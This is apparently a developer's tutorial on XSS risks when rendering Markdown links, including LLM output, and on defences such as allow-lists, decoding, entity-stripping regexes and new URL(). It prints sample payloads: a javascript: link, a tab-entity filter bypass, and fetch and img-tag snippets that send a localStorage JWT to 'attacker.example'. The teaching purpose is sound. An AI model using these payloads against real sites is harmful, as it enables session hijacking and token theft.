How to Parse URLs from Markdown to HTML Securely?
Initially, this might sound like a simple question: just use the built-in `url` module in Node.js to parse URLs, right? Or better yet, use the JavaScript `URL` object via `new URL()` and extract the parts you need from there. But this might not be as easy as it seems.
Let's evaluate based on a real-world scenario that I've seen done in the wild, referring specifically to Markdown-based libraries.
Markdown to HTML
One of the most popular use-cases that requires URL parsing is handling Markdown-formatted content and rendering it on a web page, which means translating it into its HTML equivalent.
Actually, this use-case might sound more relevant to you than ever before, due to the rise of LLMs (Large Language Models): these generative text models return structured content in their response payloads, and you then need to render it on the page.
To put that use-case into practical terms, imagine you have a React component that renders a chat-bot-like interface on the page. Practically, the messages go through a library like `marked-react` to convert the Markdown syntax from the LLM response into HTML.
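As a simplified, framework-free sketch of that conversion step (`naiveMarkdownLink` is an illustrative name, not part of marked-react's API), a naive Markdown-link-to-HTML conversion might look like this:

```javascript
// Illustrative sketch only: a naive converter that turns Markdown links
// ([text](url)) into HTML anchor tags, copying the URL verbatim into the
// href attribute. This mimics what a Markdown renderer does, minus any
// safety checks on the URL.
function naiveMarkdownLink(markdown) {
  return markdown.replace(
    /\[([^\]]+)\]\(([^)]+)\)/g,
    (_match, text, url) => `<a href="${url}">${text}</a>`
  );
}
```

Note that the URL lands in the `href` attribute exactly as it appeared in the Markdown source — that detail is what the rest of this article is about.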
Parsing Dangerous URLs from Markdown
Ok, so we've covered the use-case to provide an example of where and why you'll often need to parse URLs from arbitrary strings, be it Markdown or otherwise.
Now imagine what the Markdown content might look like — for example, a link such as `[Visit my website](https://example.com)`. Or maybe: `Check out [this blog post](https://example.com/blog/hello)`.
So what stops someone from crafting a malicious URL that uses the `javascript:` protocol scheme to execute arbitrary JavaScript code? That is exactly how we get to Cross-site Scripting (XSS) vulnerabilities.
Imagine the following XSS payload: `[Click me](javascript:alert('XSS'))`. A Markdown parser might naively translate the URL verbatim into the equivalent HTML anchor tag: `<a href="javascript:alert('XSS')">Click me</a>`.
What's in a JavaScript alert('XSS')?
Oh, right. This might not seem dangerous at first glance. What's in an alert pop-up?
But if, for example, you use JWTs to manage authentication and store them in local storage, then this type of XSS attack allows exfiltrating the JWT token and hijacking the user's session. Imagine the following:
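A hypothetical payload might be sketched like this — `attacker.example` is a made-up domain, and the `jwt` storage key is an assumption:

```javascript
// Hypothetical attacker payload: builds a URL that smuggles the victim's
// token out as a query-string parameter (attacker.example is made up).
function buildExfilUrl(token) {
  return 'https://attacker.example/steal?token=' + encodeURIComponent(token);
}

// Inside the injected script, the attacker would run something like:
//   fetch(buildExfilUrl(localStorage.getItem('jwt')));
```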
I wish it were that easy, but it's not. If you've been doing web development for a while, you've probably been bitten by this little thing called CORS, which is the devil, but let's not get side-tracked. CORS is a browser security feature that prevents cross-origin requests (requests from one origin (domain) to another, roughly speaking), so the above example won't work as-is. So not really the devil? More like your guardian angel.
The game isn't over though: we can come up with JavaScript code that creates an image tag and sets its `src` attribute to the URL we want to exfiltrate the token to:
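A sketch of such a payload (again, `attacker.example` is a made-up domain; the function wrapper is just for illustration):

```javascript
// Hypothetical payload: CORS only blocks *reading* cross-origin responses.
// An <img> request doesn't need the response to be readable — the GET
// request alone delivers the token to the attacker's server.
function exfiltrateViaImage(doc, token) {
  const img = doc.createElement('img');
  img.src = 'https://attacker.example/steal?token=' + encodeURIComponent(token);
  doc.body.appendChild(img);
  return img.src;
}

// In the injected script this would simply run as:
//   exfiltrateViaImage(document, localStorage.getItem('jwt'));
```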
Slick, eh? :-)
Anyway, I'm digressing here. But I do enjoy showing you and teaching you a bunch of web security tricks!
Parsing a URL in JavaScript
So back to the problem at hand. You get a Markdown link element with a URL of `javascript:alert()`, and now what? Well, maybe you pass it to `new URL()`, or maybe you manually parse it with a regex pattern to ensure it doesn't include dangerous protocols like `javascript:`, right? You'd likely end up with a deny-list of protocol schemes and a function that rejects any URL that could turn into an XSS attack. Congrats.
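Such a deny-list check might look like this sketch (the `unsafeLinkPrefix` name mirrors the pattern described later in this article; the exact list of prefixes is illustrative):

```javascript
// Deny-list approach (spoiler: insufficient on its own). unsafeLinkPrefix
// enumerates protocol schemes we want to reject outright.
const unsafeLinkPrefix = ['javascript:', 'data:', 'vbscript:'];

function isDeniedUrl(url) {
  const normalized = url.toLowerCase().trim();
  return unsafeLinkPrefix.some((prefix) => normalized.startsWith(prefix));
}
```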
Insecure URL Parsing
But what if I told you that denying protocol schemes like that is not enough?
Imagine user input, or a tricked LLM-generated response, that includes the following URL: `jav&#x09;ascript:alert('XSS')`.
This might look odd to you, but the browser certainly knows how to interpret it. Your regex pattern-matching logic will not catch this attack because it doesn't strictly match the string "javascript", right?
What does it do though? Let's break it down. First of all, the text `&#x09;` is an HTML entity. Specifically, this one refers to the horizontal tab character. Each of these characters has a meaning:
- `&` starts the entity reference.
- `#` indicates a numeric character reference.
- `x09` is the hexadecimal Unicode code point for the tab character (equivalent to decimal 9).
- `;` ends the entity reference.
Similarly, there are other payloads that utilize HTML entities to bypass bad regex patterns or just generally insecure pattern matching logic that would allow the URL to be kept as-is, and when it hits the DOM, the browser will easily interpret it as a JavaScript URL.
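To see why, here is a small demonstration of what happens once the entity is decoded — per the WHATWG URL specification, browsers additionally strip ASCII tab and newline characters from URLs, so the scheme collapses right back to `javascript:`:

```javascript
// The payload as it appears in the Markdown/HTML source:
const payload = "jav&#x09;ascript:alert('XSS')";

// Step 1: the HTML parser decodes the entity into a real tab character.
const decoded = payload.replace(/&#x0?9;/gi, '\t');

// Step 2: per the WHATWG URL spec, ASCII tab and newline characters are
// stripped from URLs, so the effective scheme becomes "javascript:".
const effective = decoded.replace(/[\t\n\r]/g, '');
```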
How to Securely Parse URLs from Markdown
At this point I think we've made the point about the dangers of parsing URLs. So, to get to the positive side of things, let's talk about patterns and security best practices for properly and securely addressing URL parsing.
The following practices are listed in the specific, ascending order you should follow to secure your URL parsing logic:
1. Allow-list vs Deny-list
Development patterns such as maintaining an `unsafeLinkPrefix` array are a form of deny-list, and that's often a bad pattern. The reason is that attackers will always come up with novel ways and new tricks to bypass your deny-list, while you, on the other hand, have to keep up with it and maintain it. It's a losing battle.
So, instead of having a deny-list that includes `javascript:` and any other protocols you deem dangerous, change perspective and work from an allow-list: what is it reasonable to allow in a URL for it to be valid in your use-cases?
For example, allow only the `https:` protocol.
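A minimal sketch of an allow-list check, assuming an https-only policy:

```javascript
// Allow-list approach: accept only protocols we explicitly trust. Anything
// else — including schemes we never thought of — is rejected by default.
const ALLOWED_PROTOCOLS = ['https:'];

function isAllowedUrl(input) {
  try {
    return ALLOWED_PROTOCOLS.includes(new URL(input).protocol);
  } catch {
    return false; // not a parseable absolute URL
  }
}
```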
2. Use secure anchor tags
When you render the URL as an anchor tag, you can utilize web standards that help enforce hardened security. For example, by default, render all anchor HTML elements with the attributes `rel="noopener noreferrer"` and `target="_blank"`.
By doing that, the browser will open the URL in a new tab and will not allow the newly opened page to access the `window.opener` property, which is a common vector for phishing attacks.
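As a sketch, rendering a link with those hardened defaults might look like this (assuming `href` and `text` have already been validated and HTML-escaped upstream):

```javascript
// Render an anchor with hardened defaults: target="_blank" opens a new
// tab; rel="noopener noreferrer" cuts off window.opener access and
// suppresses the Referer header. href and text are assumed to be
// validated and escaped before reaching this function.
function renderSafeAnchor(href, text) {
  return `<a href="${href}" target="_blank" rel="noopener noreferrer">${text}</a>`;
}
```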
3. Secure by default
This practice I specifically want to devote to library authors.
If you're maintaining a library or some form of 3rd-party dependency that handles the parsing logic, you might say that it is not your responsibility to decide whether URLs are opened in the same browsing tab or a new tab, or whether you should also support the `ftp://` protocol scheme.
I get you.
But there's a lot of value in providing a safe, hardened, Secure-by-default approach that guarantees safe security defaults for the absolute majority of users, and then building on top of it a way for consumers to opt out of these safe defaults and change the behavior to allow for more flexibility. At that point, they can consider the security implications of deviating from the default and make an informed decision (hopefully).
4. Decode URLs
URLs can be encoded in various ways. For example, the URL `https://lirantal.com` can be encoded as `https%3A%2F%2Flirantal.com`. That encoded form isn't a valid URL on its own, but since this is an article and I have no idea how you intend to parse URLs, you may well have a use-case in which you get URLs from a query string, say `https://example.com?redirect=https%3A%2F%2Flirantal.com`, and that's where encoding and decoding URLs comes in handy.
All that to say: your first step in parsing URLs is to decode them, so that you get a normalized URL representation you can work with.
In technical terms, it means:
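A sketch of that decoding step:

```javascript
// Normalize first: decode percent-encoding so that later checks run
// against the URL's real characters rather than their encoded forms.
function decodeUrl(input) {
  try {
    return decodeURIComponent(input);
  } catch {
    return input; // malformed percent-encoding; let later validation reject it
  }
}
```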
5. Sanitize HTML entities and control characters
As we've seen with the `jav&#x09;ascript:alert('XSS')` URL, you should also take into account that URLs can be crafted with payloads you wouldn't expect, such as HTML entities.
Other payloads might employ some form of control characters that can be used to bypass your URL parsing logic.
The only way to handle these characters is to match them via string pattern matching (such as a regex) and remove them from the URL before you evaluate it.
Following is my recommendation for a practical and secure regular expression to match and remove HTML entities from a URL:
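One possible pattern in that spirit (an illustration I'm supplying, not a canonical regex): match numeric and named HTML entity references so they can be stripped from the URL:

```javascript
// Matches decimal (&#9;), hexadecimal (&#x09;), and named (&Tab;) HTML
// entity references. The trailing semicolon is optional for numeric
// forms, which browsers also tolerate.
const HTML_ENTITY_PATTERN = /&(?:#\d+;?|#x[0-9a-f]+;?|[a-z][a-z0-9]*;)/gi;

function stripHtmlEntities(url) {
  return url.replace(HTML_ENTITY_PATTERN, '');
}
```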
Another variation of the above that you may consider is the following all-in-one regex:
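And an all-in-one variation (again, illustrative): strip HTML entities and ASCII control characters in a single pass:

```javascript
// Removes HTML entity references and ASCII control characters (including
// tab, newline, and carriage return) from the URL in one pass.
function sanitizeUrl(url) {
  return url.replace(
    /&(?:#\d+;?|#x[0-9a-f]+;?|[a-z][a-z0-9]*;)|[\u0000-\u001f\u007f]/gi,
    ''
  );
}
```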
6. Use the URL parser
Finally, pass the URL to the `new URL()` constructor and handle any thrown exceptions.
For example, even if you skip the previous step of sanitizing HTML entities and pass the URL as-is to `new URL()`, it will throw an error, because HTML entities are invalid inside a protocol scheme:
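A quick check confirms it — `&` and `#` are not legal characters in a URL scheme, so the parser rejects the raw payload outright:

```javascript
// "&" and "#" are not legal characters in a URL scheme, so parsing the
// raw entity payload fails with a TypeError ("Invalid URL").
function tryParseUrl(input) {
  try {
    return new URL(input).href;
  } catch {
    return null;
  }
}
```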
Still, you'd probably want to keep the URL sanitization logic in place, and also run the result through `new URL()` to ensure it's a valid URL and no errors are thrown.
If you do choose to use the `URL()` constructor web API, you'll probably want to apply this ordered list of practices slightly differently: once you've decoded the URL, sanitized it, and run it through `new URL()`, apply the allow-list logic by checking the protocol scheme via the returned object's `url.protocol` property.
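Putting it all together — decode, sanitize, parse, then allow-list the protocol (the sanitizing regex and the https-only policy below are illustrative choices):

```javascript
// Full pipeline sketch: decode percent-encoding, strip HTML entities and
// control characters, parse with new URL(), then enforce an allow-list.
function parseSafeUrl(input) {
  let candidate = input;
  try {
    candidate = decodeURIComponent(candidate);
  } catch {
    // malformed percent-encoding: keep the raw input; parsing will reject it
  }
  candidate = candidate.replace(
    /&(?:#\d+;?|#x[0-9a-f]+;?|[a-z][a-z0-9]*;)|[\u0000-\u001f\u007f]/gi,
    ''
  );
  try {
    const url = new URL(candidate);
    return url.protocol === 'https:' ? url : null;
  } catch {
    return null;
  }
}
```

Returning the parsed `URL` object (rather than the raw string) lets callers use the already-validated `protocol`, `hostname`, and other components without re-parsing.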